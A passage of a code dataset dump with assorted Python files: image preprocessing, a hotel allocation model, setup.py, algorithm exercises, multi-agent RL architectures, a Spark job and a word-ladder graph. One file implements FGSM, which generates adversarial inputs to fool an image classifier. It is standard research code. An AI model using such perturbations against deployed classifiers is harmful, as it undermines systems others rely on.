truncated_normal(pot_size, std_dev, minimum, maximum)\n self.bet_amount(bet_size)\n return bet_size\n\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n", "sub_path": "pokerbot/flow_control/.ipynb_checkpoints/player-checkpoint.py", "file_name": "player-checkpoint.py", "file_ext": "py", "file_size_in_byte": 4346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 62, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 67, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "371877091", "text": "\"\"\"\n对图像进行预处理\n\"\"\"\nimport numpy as np\nimport os\nimport shutil\nimport skimage.io as io\n\n\ndef fill_a_image(image, new_size: tuple):\n \"\"\"\n 对图像做镜像填充,new_size必须大于原image大小\n :param image: 输入图像\n :param new_size: 输出大小\n :return: 输出图像\n \"\"\"\n height, width = image.shape\n new_height, new_width = new_size\n corner_left_width = int((new_width - width) / 2)\n corner_right_width = new_width - width - corner_left_width\n corner_up_height = int((new_height - height) / 2)\n corner_bottom_height = new_height - height - corner_up_height\n\n new_image = np.zeros(new_size)\n\n # up\n new_image[0: corner_up_height, corner_left_width: new_width - corner_right_width] = \\\n np.flipud(image[0: corner_up_height, :])\n # left\n new_image[corner_up_height: new_height - corner_bottom_height, : corner_left_width] = \\\n np.fliplr(image[:, : corner_left_width])\n # bottom\n new_image[new_height - corner_bottom_height:, corner_left_width: new_width - corner_right_width] = \\\n np.flipud(image[height - corner_bottom_height:, :])\n # right\n new_image[corner_up_height: new_height - corner_bottom_height, new_width - corner_right_width:] = \\\n np.fliplr(image[:, width - corner_right_width:])\n # left-up\n new_image[0: corner_up_height, 0: corner_left_width] = \\\n np.fliplr(new_image[: corner_up_height, corner_left_width: corner_left_width * 2])\n # right-up\n new_image[0: corner_up_height, new_width - corner_right_width:] = \\\n np.fliplr(new_image[: corner_up_height, new_width - 2 * corner_right_width: new_width - corner_right_width])\n # left-bottom\n new_image[new_height - corner_bottom_height:, 0: corner_left_width] = \\\n np.fliplr(new_image[new_height - corner_bottom_height:, corner_left_width: corner_left_width * 2])\n # right-bottom\n new_image[new_height - corner_bottom_height:, new_width - corner_right_width:] = \\\n np.fliplr(new_image[new_height - corner_bottom_height:,\n new_width - 2 * corner_right_width: new_width - corner_right_width])\n\n # center\n new_image[corner_up_height: new_height - corner_bottom_height, corner_left_width: new_width - corner_right_width] = \\\n image\n\n new_image = new_image.astype('uint8') # uint8数据类型,拷贝返回\n\n return new_image\n\n\ndef fill_images(from_path: str, save_path: str):\n \"\"\"\n 读取某一个路径下的所有图片,进行镜像填充处理,然后保存到新的路径中\n :param from_path: 来自哪个路径\n :param save_path: 保存到哪个路径\n :return: 无\n \"\"\"\n print(\"fill images in path:\" + from_path)\n file_list = os.listdir(from_path)\n file_list.sort()\n for file_name in file_list:\n new_image = fill_a_image(io.imread(os.path.join(from_path, file_name), as_gray=True), (572, 572))\n if save_path is None:\n continue\n io.imsave(os.path.join(save_path, os.path.splitext(file_name)[0] + '_filled_572x572.png'), new_image)\n print(\"All finished!\")\n\n\ndef mirror_fill():\n \"\"\"\n 图像镜像填充\n :return:无\n \"\"\"\n from_path = ('./membrane_data/data/train/images',\n './membrane_data/data/validation/images',\n './membrane_data/data/predict/images',\n )\n save_path = ('./membrane_data/data/train/images_filled',\n './membrane_data/data/validation/images_filled',\n './membrane_data/data/predict/images_filled',\n )\n # 检查来源路径是否存在\n for path in from_path:\n if os.path.exists(path) is False:\n print(path + ' is not exist! 
Please check it!')\n return\n\n # 运行前的一些清理、创建\n for i in range(len(save_path)):\n if os.path.exists(save_path[i]): # 保存路径若存在,则删除\n shutil.rmtree(save_path[i]) # 资源管理器打开时也能删除,就是不同创建\n os.mkdir(save_path[i]) # 然后再重新创建(务必关闭资源管理器)\n\n # 对图片进行镜像填充\n for i in range(len(from_path)):\n fill_images(from_path[i], save_path[i])\n\n\n\ndef crop_images():\n from_path = ('./membrane_data/data/train/masks',\n './membrane_data/data/validation/masks',\n )\n save_path = ('./membrane_data/data/train/masks_cropped',\n './membrane_data/data/validation/masks_cropped',\n )\n\n # 检查来源路径是否存在\n for path in from_path:\n if os.path.exists(path) is False:\n print(path + ' is not exist! Please check it!')\n return\n\n # 运行前的一些清理、创建\n for i in range(len(save_path)):\n if os.path.exists(save_path[i]): # 保存路径若存在,则删除\n shutil.rmtree(save_path[i]) # 资源管理器打开时也能删除,就是不同创建\n os.mkdir(save_path[i]) # 然后再重新创建(务必关闭资源管理器)\n\n # 裁剪图像\n for i in range(len(from_path)):\n print(\"crop images in path:\", from_path[i])\n name_list = os.listdir(from_path[i])\n for name in name_list:\n img = io.imread(os.path.join(from_path[i], name), as_gray=True)\n img = np.split(img, [62, 450], axis=0)[1] # 按行裁剪,即裁剪上下两头\n img = np.split(img, [62, 450], axis=1)[1] # 按列裁剪,即裁剪左右两头\n io.imsave(os.path.join(save_path[i], os.path.splitext(name)[0] + \"_cropped_388x388.png\"), img)\n print(\"All finished!\")\nif __name__ == '__main__':\n mirror_fill()\n crop_images()", "sub_path": "lemon_unet/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 5712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 69, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 72, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 75, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 101, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, 
"usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 127, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 133, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 135, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 135, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.split", "line_number": 137, "usage_type": "call"}, {"api_name": "skimage.io.imsave", "line_number": 138, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 138, "usage_type": "call"}]}
+{"seq_id": "642903029", "text": "from typing import Union, List, Tuple\n\nfrom model.Individas import Individas\nfrom model.Pora import Pora\nfrom model.Šeima import Šeima\n\n\nclass Apartamentai:\n numeris: int\n vietų_skaičius: int\n gyvena: Union[List[Individas], Pora, Šeima] = None\n užimtas: bool = False\n\n def __init__(self, numeris, vietų_skaičius):\n self.numeris = numeris\n self.vietų_skaičius = vietų_skaičius\n\n def __ar_galima_apgyvendinti(self, individas):\n lytis = individas.lytis\n for gyventojas in self.gyvena:\n if gyventojas.lytis != lytis and not gyventojas.sutinka:\n return False\n return True\n\n def apgyvendinti(self, grupė: Union[Individas, Pora, Šeima]) -> Tuple[\n bool, Union[Individas, Pora, Šeima, None]]:\n if isinstance(grupė, (Šeima, Pora)):\n if not self.gyvena and self.vietų_skaičius >= grupė.žmonių_skaičius:\n self.gyvena = grupė\n self.užimtas = True\n return True, None\n else:\n return False, grupė\n\n if isinstance(grupė, Individas):\n individas = grupė\n if not self.gyvena:\n self.gyvena = [individas]\n return True, None\n elif self.__ar_galima_apgyvendinti(individas):\n self.gyvena.append(individas)\n if len(self.gyvena) == self.vietų_skaičius:\n self.užimtas = True\n return True, None\n return False, individas\n\n", "sub_path": "ZP18-1/hotel/model/Apartamentai.py", "file_name": "Apartamentai.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 27, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 27, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 35, "usage_type": "argument"}, {"api_name": "typing.Tuple", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "247633519", "text": "import numpy as np\nimport keras.backend as K\n\nEPOCHS = 5\nEPSILON = 0.03\n\n\ndef fgsm(reshaped_image, model, shape=(28, 28, 1), num_classes=10):\n\n x = reshaped_image.reshape((-1,) + shape).astype('float32')\n # x = reshaped_image\n\n preds = model.predict(x)\n initial_class = np.argmax(preds)\n\n print('initial class: {}'.format(initial_class), end='')\n\n sess = K.get_session()\n x_adv = x\n x_noise = np.zeros_like(x)\n\n for i in range(EPOCHS):\n target = K.one_hot(initial_class, num_classes)\n\n loss = K.categorical_crossentropy(target, model.output)\n grads = K.gradients(loss, model.input)\n\n delta = K.sign(grads[0])\n x_noise = x_noise + delta\n\n x_adv = x_adv + EPSILON * delta\n\n x_adv = sess.run(x_adv, feed_dict={model.input: x})\n preds = model.predict(x_adv)\n # print('epoch: %d, preds: %f, class: %d' % (i, preds[0][initial_class], np.argmax(preds)))\n\n print(' class: %d' % (np.argmax(preds)))\n return x_adv\n", "sub_path": "others/old_fgsm.py", "file_name": "old_fgsm.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.argmax", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.backend.one_hot", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 23, "usage_type": "name"}, {"api_name": "keras.backend.categorical_crossentropy", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 25, "usage_type": "name"}, {"api_name": "keras.backend.gradients", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 26, "usage_type": "name"}, {"api_name": "keras.backend.sign", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "517400380", "text": "# -*- coding: utf-8 -*-\nimport warnings\nfrom distutils.command.build_ext import build_ext\nfrom distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError\nfrom setuptools import setup\nfrom Cython.Build import cythonize\nimport numpy\n\nimport versioneer\n\nclass BuildFailure(Exception):\n pass\n\nclass CatchableBuildExt(build_ext):\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailure()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except (CCompilerError, DistutilsExecError, DistutilsPlatformError):\n raise BuildFailure()\n\ntry:\n setup(version=versioneer.get_version(),\n cmdclass={**versioneer.get_cmdclass(), 'build_ext': CatchableBuildExt},\n ext_modules=cythonize(\n \"perception/**/extensions.pyx\",\n ), include_dirs=[numpy.get_include()])\nexcept BuildFailure:\n warnings.warn('Failed to build Cython extensions. They will not be available at runtime.')\n setup(version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass())\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "distutils.command.build_ext.build_ext", "line_number": 14, "usage_type": "name"}, {"api_name": "distutils.command.build_ext.build_ext.run", "line_number": 17, "usage_type": "call"}, {"api_name": "distutils.command.build_ext.build_ext", "line_number": 17, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsPlatformError", "line_number": 18, "usage_type": "name"}, {"api_name": "distutils.command.build_ext.build_ext.build_extension", "line_number": 23, "usage_type": "call"}, {"api_name": "distutils.command.build_ext.build_ext", "line_number": 23, "usage_type": "name"}, {"api_name": "distutils.errors.CCompilerError", "line_number": 24, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsExecError", "line_number": 24, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsPlatformError", "line_number": 24, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 28, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 28, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 29, "usage_type": "call"}, {"api_name": "Cython.Build.cythonize", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 32, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 34, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 35, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 35, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "221642814", "text": "'''\n输入整数数组 arr ,找出其中最小的 k 个数。例如,输入4、5、1、6、2、7、3、8这8个数字,则最小的4个数字是1、2、3、4。\n示例 1:\n输入:arr = [3,2,1], k = 2\n输出:[1,2] 或者 [2,1]\n\n链接:https://leetcode-cn.com/problems/zui-xiao-de-kge-shu-lcof\n'''\n'''\n分析\n本题最简单的做法是排序。时间复杂度nlogn\n其次是堆 时间复杂度是nlogk\n最后是快速选择,时间复杂度是n\n现在实现后面俩种\n'''\nfrom typing import List\nimport heapq\ndef getLeastNumbers( arr: List[int], k: int) -> List[int]:\n '''\n 堆排序\n :param arr:\n :param k:\n :return:\n '''\n if k == 0:\n return []\n hp=[]\n for i in arr[:k]:\n # 建立小顶堆,使用相反数得到大顶堆\n hp.append(-i)\n heapq.heapify(hp)\n for i in arr[k:]:\n # 现在是大顶推\n if -i > hp[0]:\n heapq.heappop(hp)\n heapq.heappush(hp,-i)\n ans =[-i for i in hp]\n return ans\n\nimport random\ndef getLeastNumbers2( arr: List[int], k: int) -> List[int]:\n '''\n 快速选择法\n :param arr:\n :param k:\n :return:\n '''\n if k == 0:return []\n randomized_selected(arr,0,len(arr)-1,k)\n return arr[:k]\n\ndef randomized_selected(arr:List,l,r,k):\n '''\n 我们定义函数 randomized_selected(arr, l, r, k) 表示划分数组 arr 的 [l,r] 部分,使前 k 小的数在数组的左侧,在函数里我们调用快排的划分函数,假设划分函数返回的下标是 pos(表示分界值 pivot 最终在数组中的位置),即 pivot 是数组中第 pos - l + 1 小的数,\n 那么一共会有三种情况:\n 如果 pos - l + 1 == k,表示 pivot 就是第 kk 小的数,直接返回即可;\n 如果 pos - l + 1 < k,表示第 kk 小的数在 pivot 的右侧,因此递归调用 randomized_selected(arr, pos + 1, r, k - (pos - l + 1));\n 如果 pos - l + 1 > k,表示第 kk 小的数在 pivot 的左侧,递归调用 randomized_selected(arr, l, pos - 1, k)。\n :return:\n '''\n pos = randomized_partition(arr,l,r)\n num = pos - l + 1\n if num < k:\n randomized_selected(arr ,pos +1,r,k-num)\n if num > k:\n randomized_selected(arr,l,pos-1,k)\n\n# 下面利用快排的过程\ndef randomized_partition(arr,l,r):\n pidx = random.randint(l,r)\n arr[l],arr[pidx] = arr[pidx],arr[l]\n m = partition(arr,l,r)\n return m\n\ndef partition(arr,l,r):\n pivot ,j = arr[l],l\n for i in range(l+1,r+1):\n if arr[i] <= pivot:\n j+=1\n arr[i],arr[j] = arr[j],arr[i]\n arr[l],arr[j] = arr[j] ,arr[l]\n return j\n\n\nif __name__ == '__main__':\n arr = [3, 2, 1]\n k = 2\n print(getLeastNumbers2(arr,k))\n", "sub_path": "code/31_最小的K个数.py", "file_name": "31_最小的K个数.py", "file_ext": "py", "file_size_in_byte": 2726, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "heapq.heapify", "line_number": 31, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 35, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "321290750", "text": "# python3\n# Copyright 2021 InstaDeep Ltd. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Architectures using networked agents for multi-agent RL systems\"\"\"\n\nimport copy\nfrom typing import Dict, List, Tuple\n\nimport sonnet as snt\nimport tensorflow as tf\nfrom acme import specs as acme_specs\n\nfrom mava import specs as mava_specs\nfrom mava.components.tf.architectures.decentralised import (\n DecentralisedPolicyActor,\n DecentralisedQValueActorCritic,\n)\n\n\nclass NetworkedPolicyActor(DecentralisedPolicyActor):\n \"\"\"Networked multi-agent actor critic architecture.\"\"\"\n\n def __init__(\n self,\n environment_spec: mava_specs.MAEnvironmentSpec,\n network_spec: Dict[str, List[str]],\n observation_networks: Dict[str, snt.Module],\n policy_networks: Dict[str, snt.Module],\n shared_weights: bool = False,\n ):\n super().__init__(\n environment_spec=environment_spec,\n observation_networks=observation_networks,\n policy_networks=policy_networks,\n shared_weights=shared_weights,\n )\n\n self._network_spec = network_spec\n\n if self._shared_weights:\n raise Exception(\n \"Networked architectures currently do not support weight sharing.\"\n )\n\n def _get_actor_spec(self, agent_key: str) -> Dict[str, acme_specs.Array]:\n \"\"\"Create network structure specifying connection between agents\"\"\"\n actor_obs_specs: Dict[str, acme_specs.Array] = {}\n\n agents_by_type = self._env_spec.get_agents_by_type()\n\n for agent_type, agents in agents_by_type.items():\n actor_obs_shape = list(\n copy.copy(\n self._agent_type_specs[agent_type].observations.observation.shape\n )\n )\n for agent in agents:\n actor_obs_shape.insert(0, len(self._network_spec[agent]))\n actor_obs_specs[agent] = tf.TensorSpec(\n shape=actor_obs_shape,\n dtype=tf.dtypes.float32,\n )\n return actor_obs_specs\n\n\nclass NetworkedQValueCritic(DecentralisedQValueActorCritic):\n \"\"\"Centralised multi-agent actor critic architecture.\"\"\"\n\n def __init__(\n self,\n environment_spec: mava_specs.MAEnvironmentSpec,\n network_spec: Dict[str, List[str]],\n observation_networks: Dict[str, snt.Module],\n policy_networks: Dict[str, snt.Module],\n critic_networks: Dict[str, snt.Module],\n shared_weights: bool = True,\n ):\n super().__init__(\n environment_spec=environment_spec,\n observation_networks=observation_networks,\n policy_networks=policy_networks,\n critic_networks=critic_networks,\n shared_weights=shared_weights,\n )\n\n self._network_spec = network_spec\n\n if self._shared_weights:\n raise Exception(\n \"Networked architectures currently do not support weight sharing.\"\n )\n\n def _get_critic_specs(\n self,\n ) -> Tuple[Dict[str, acme_specs.Array], Dict[str, acme_specs.Array]]:\n critic_obs_specs: Dict[str, acme_specs.Array] = {}\n critic_act_specs: Dict[str, acme_specs.Array] = {}\n\n agents_by_type = self._env_spec.get_agents_by_type()\n\n for agent_type, agents in agents_by_type.items():\n for agent in agents:\n critic_obs_shape = 
list(copy.copy(self._embed_specs[agent].shape))\n critic_act_shape = list(\n copy.copy(self._agent_specs[agent].actions.shape)\n )\n critic_obs_shape.insert(0, len(self._network_spec[agent]))\n critic_obs_specs[agent] = tf.TensorSpec(\n shape=critic_obs_shape,\n dtype=tf.dtypes.float32,\n )\n critic_act_shape.insert(0, len(self._network_spec[agent]))\n critic_act_specs[agent] = tf.TensorSpec(\n shape=critic_act_shape,\n dtype=tf.dtypes.float32,\n )\n\n return critic_obs_specs, critic_act_specs\n", "sub_path": "multi-agent RL/Mava-develop/mava/components/tf/architectures/networked.py", "file_name": "networked.py", "file_ext": "py", "file_size_in_byte": 4671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "mava.components.tf.architectures.decentralised.DecentralisedPolicyActor", "line_number": 32, "usage_type": "name"}, {"api_name": "mava.specs.MAEnvironmentSpec", "line_number": 37, "usage_type": "attribute"}, {"api_name": "mava.specs", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 39, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 59, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 59, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 59, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.TensorSpec", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 73, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 57, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 57, "usage_type": "name"}, {"api_name": "mava.components.tf.architectures.decentralised.DecentralisedQValueActorCritic", "line_number": 78, "usage_type": "name"}, {"api_name": "mava.specs.MAEnvironmentSpec", "line_number": 83, "usage_type": "attribute"}, {"api_name": "mava.specs", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 85, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 85, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 86, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 86, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 87, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 87, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 108, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 108, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 109, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 109, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 109, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": 
"call"}, {"api_name": "copy.copy", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.TensorSpec", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 107, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 107, "usage_type": "name"}]}
+{"seq_id": "63693700", "text": "from pyspark import SparkConf, SparkContext\nfrom google.cloud import storage\nimport json\nfrom datetime import datetime\n\nSAVE_DIR = 'categories'\nGCP_BUCKET = 'gs://big_data_econ'\nsc = SparkContext.getOrCreate()\n\n# Read in all json files into an RDD\n# Use 'wholeTextFiles' to prevent fragmenting of json objects\nmonths = sc.wholeTextFiles(GCP_BUCKET + '/articles_subset/*.json')\n\n# Jsonnify each text string into a dictionary\nmonths = months.map(lambda x: json.loads(x[1]))\narticles = months.flatMap(lambda x: x)\n\ndef get_year_categories(article):\n time = datetime.strptime(article['pub_date'].split('T')[0], '%Y-%m-%d')\n year = time.year\n news_desk = get_field(article, field='news_desk')\n return (year, news_desk)\n\ndef get_field(data, field):\n if field in data and data[field] and data[field]!='None':\n return data[field].lower()\n else:\n return ''\n\n# Aggregate category counts for each year\ncategories = articles.map(lambda article: get_year_categories(article))\n\n# Calculate average article wordcount for a each year\nyear_categories = categories.map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y)\n\ndf = year_categories.map(lambda x: (x[0][0], x[0][1], x[1])).toDF()\ndf = df.selectExpr('_1 as year', '_2 as category', '_3 as count')\n\n# Save data to Google Cloud Bucket\ndf.coalesce(1).write.format('csv').save('gs://big_data_econ/csvs/' + SAVE_DIR)", "sub_path": "spark_scripts/category_counts.py", "file_name": "category_counts.py", "file_ext": "py", "file_size_in_byte": 1382, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pyspark.SparkContext.getOrCreate", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 8, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "75025951", "text": "from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom collections import defaultdict\nfrom itertools import product\n\nfrom alg_breadth_first_search import traverse_bfs\n\nWORDS_FILE = 'four_letter_words.txt'\n\n\ndef read_words():\n \"\"\"Read words file with producing a generator.\"\"\"\n with open(WORDS_FILE) as f:\n for line in f:\n # Skip the end line symbol.\n yield line[:-1]\n\n\ndef build_word_ladder_graph(words):\n vertex_dict = defaultdict(list)\n graph_dict = defaultdict(set)\n\n # Create buckets of words that are different by one letter.\n for word in words:\n for i in xrange(len(word)):\n bucket = '{0}_{1}'.format(word[:i], word[i+1:])\n # if bucket in vertex_dict:\n # vertex_dict[bucket].append(word)\n # else:\n # vertex_dict[bucket] = list(word)\n vertex_dict[bucket].append(word)\n\n # Add vertices and edges for words in the same buckets.\n for bucket, neighbors_ls in vertex_dict.items():\n word_pairs_tuple = (\n ((word1, word2) \n for word1, word2 in product(neighbors_ls, repeat=2) \n if word1 != word2))\n \n for word1, word2 in word_pairs_tuple:\n graph_dict[word1].add(word2)\n graph_dict[word2].add(word1)\n\n return graph_dict\n\n\ndef main():\n words = read_words()\n words_graph = build_word_ladder_graph(words)\n # print(words_graph)\n\n start_word = 'ACID'\n end_word = 'EYED'\n 